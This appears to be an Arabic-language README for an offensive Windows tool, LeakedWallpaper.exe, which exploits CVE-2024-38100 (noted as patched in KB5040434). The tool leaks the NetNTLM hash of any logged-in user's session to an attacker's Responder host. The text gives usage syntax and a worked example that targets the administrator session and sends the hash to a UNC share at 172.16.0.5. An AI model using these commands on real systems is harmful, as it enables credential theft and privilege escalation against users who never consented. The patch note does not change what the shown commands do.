
تسريب تجزئة NetNTLM لأي مستخدم. تم إصلاحه في KB5040434.
هذه أداة لتصعيد الامتيازات (تم إصلاحها عبر CVE-2024-38100 في KB5040434) تسمح لنا بتسريب تجزئة NetNTLM الخاصة بالمستخدم من أي جلسة على الحاسوب، حتى لو كنا نعمل من مستخدم منخفض الامتيازات.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
إذا كان محظورًا، شاهد demo.mkv
لنفترض أن لدينا جلستين على الجهاز المضيف:
معرّف الجلسة الحالية: 2
معرّف الجلسة المستهدفة: 1

عنوان IP الخاص بـ Responder: 172.16.0.5
عنوان IP الخاص بنظام Windows: 172.16.0.2

لنحصل على تجزئة NetNTLM الخاصة بـ administrator باستخدام الأداة!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
نجاح!
